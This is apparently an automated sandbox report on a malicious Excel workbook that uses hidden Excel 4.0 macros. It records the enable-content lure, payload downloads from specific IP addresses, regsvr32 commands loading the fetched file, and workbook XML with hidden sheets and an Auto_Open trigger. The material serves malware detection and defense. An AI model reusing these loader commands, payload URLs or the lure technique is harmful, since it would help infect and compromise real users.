Loading ...

Play interactive tourEdit tour

Analysis Report banUwVSwBY.xlsx

Overview

General Information

Sample Name:banUwVSwBY.xlsx
Analysis ID:431768
MD5:da5fb469bc9385f16af43843673cadc8
SHA1:414c25009dd7fad02b87f534779f6863a937aa93
SHA256:612d8808903469c5840e8697710abe11a2c7e75ccad1e61de969732c42271249
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7048 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7120 cmdline: regsvr32 -s ..\Post.storg MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 7076 cmdline: regsvr32 -s ..\Post.storg1 MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 7068 cmdline: regsvr32 -s ..\Post.storg2 MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
intlsheet4.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\Post.storg, CommandLine: regsvr32 -s ..\Post.storg, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7048, ProcessCommandLine: regsvr32 -s ..\Post.storg, ProcessId: 7120

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 86MB
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 190.14.37.134:80
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 190.14.37.134:80
    Source: Joe Sandbox ViewIP Address: 51.89.115.124 51.89.115.124
    Source: global trafficHTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.134Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.115.124Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 37.1.196.25
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.124
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.134
    Source: global trafficHTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.134Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.4024921296.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.115.124Connection: Keep-Alive
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.aadrm.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.cortana.ai
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.office.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.onedrive.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://augloop.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cdn.entity.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://clients.config.office.net/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://config.edge.skype.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cortana.ai
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cortana.ai/api
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://cr.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dev.cortana.ai
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://devnull.onenote.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://directory.services.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://graph.windows.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://graph.windows.net/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://lifecycle.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://login.windows.local
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://management.azure.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://management.azure.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://messaging.office.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ncus.contentsync.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://officeapps.live.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://onedrive.live.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://outlook.office.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://outlook.office365.com/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://settings.outlook.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://staging.cortana.ai
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://tasks.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://wus2.contentsync.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{34C063CF-955E-4ACE-9D4C-9A051EAF3AFA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext 